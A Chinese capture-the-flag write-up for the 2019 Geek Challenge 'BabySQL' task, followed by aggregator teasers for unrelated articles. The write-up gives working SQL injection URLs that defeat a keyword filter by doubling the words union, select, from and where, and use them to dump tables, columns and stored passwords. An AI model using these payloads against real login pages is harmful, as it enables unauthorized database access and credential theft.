web:[极客大挑战 2019]BabySQL

news/2024/12/22 20:04:23/

题目

点进页面显示如下

查看源代码

先尝试一下万能密码

没用,or被过滤了

试着双写看看

回显一串,也不是flag

先查询列数尝试一下,把union select过滤了,使用双写

构造payload

/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23

显示列数不对,往上加,加到3

(tips:因为要回显,所以需要设一个不是数据里面的用户,直接改成amdin1,回显字段为2和3)

成功

先查询数据库

构造payload

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23

得到数据库geek

查询表

/check.php?username=admin&password=11' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),3 %23
// 出现重写的都是被过滤的

有两个表,查询表中字段

/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23

得到三个字段

查询字段中的数据

/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(passwoorrd) ffromrom b4bsql),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23

查看源代码可得到flag

总结

考查重写绕过


http://www.ppmy.cn/news/1130336.html

相关文章

通过 Azure 日志分析加强云安全

通过 Azure 日志分析加强云安全

Microsoft Azure 云服务在安全日志存储、访问、可伸缩性、降低成本和易于部署方面提供了巨大的优势,因此在企业中很受欢迎。 Microsoft Azure 日志记录工具(如 Log360)可帮助管理 Azure 云基础结构中所有设备和应用程序(如虚拟机…
阅读更多...
力扣:113. 路径总和 II(Python3)

力扣:113. 路径总和 II(Python3)

题目: 给你二叉树的根节点 root 和一个整数目标和 targetSum ,找出所有 从根节点到叶子节点 路径总和等于给定目标和的路径。 叶子节点 是指没有子节点的节点。 来源:力扣(LeetCode) 链接:力扣(…
阅读更多...
iOS图文混排 头部有图片等相关内容的trick实现方式

iOS图文混排 头部有图片等相关内容的trick实现方式

主要应用firstLineHeadIndent 属性,留出前边的的空白距离。视觉上类似图文混排。主要函数类似这个。 demo ps:现在csdn 处处收费,真的恶心啊。不过,不收费又活不下去。哈哈。 // 1. 由文本生成attributedStringstatic func JC_AttributedTex…
阅读更多...
《Oracle系列》Oracle 索引使用情况查看

《Oracle系列》Oracle 索引使用情况查看

查询用户的索引 select index_name,table_name,tablespace_name,index_type,uniqueness,statusfrom dba_indexeswhere owner <用户名>;查询用户的索引列 select index_name,table_name,column_name,index_owner,table_ownerfrom dba_ind_columnswhere table_owner &l…
阅读更多...
阈值分割基础

阈值分割基础

固定阈值分割 固定阈值化分割是一种传统的最常用的图像分割方法&#xff0c;因其实现简单、计算量小、性能较稳定而成为图像分割中最基本和应用最广泛的分割技术。它特别适用于目标和背景占据不同灰度级范围的图像。OpenCV中使用cv2.threshold(src, thresh, maxval, type[, ds…
阅读更多...
三、git的安装和配置

三、git的安装和配置

一、安装 1.官网下载&#xff1a;https://git-scm.com/download 下载最新版本&#xff0c;点击红框或篮筐处即可 2.点击下载好的安装包安装这个软件 3.一直点击next&#xff0c;直到出现install&#xff0c;点击install&#xff0c;安装完成后点击finish&#xff1a; 下载完成…
阅读更多...
长假,GPT来敲(Jué)门(Fén)

长假,GPT来敲(Jué)门(Fén)

引 马上十一了&#xff0c;本拐在干了XX和XX事情以后&#xff0c;开始划水&#xff0c;欢天喜地的等放假。 然后&#xff0c;GPT4说更新了&#xff0c;据说加了一个读图的功能&#xff0c;本拐不以为然&#xff0c;不就是什么文生图&#xff0c;图生文么&#xff0c;TOOOLD。 不…
阅读更多...
Redis代码实践总结(三)——redis持久化

Redis代码实践总结(三)——redis持久化

Redis如何将数据写入磁盘 持久性是指将数据写入持久存储&#xff0c;例如固态磁盘 (SSD)。Redis 提供了一系列持久性选项。这些包括&#xff1a; RDB&#xff08;Redis 数据库&#xff09;&#xff1a;RDB 持久性以指定的时间间隔执行数据集的时间点快照。AOF&#xff08;仅追…
阅读更多...
最新文章

Copyright @ 2022~2023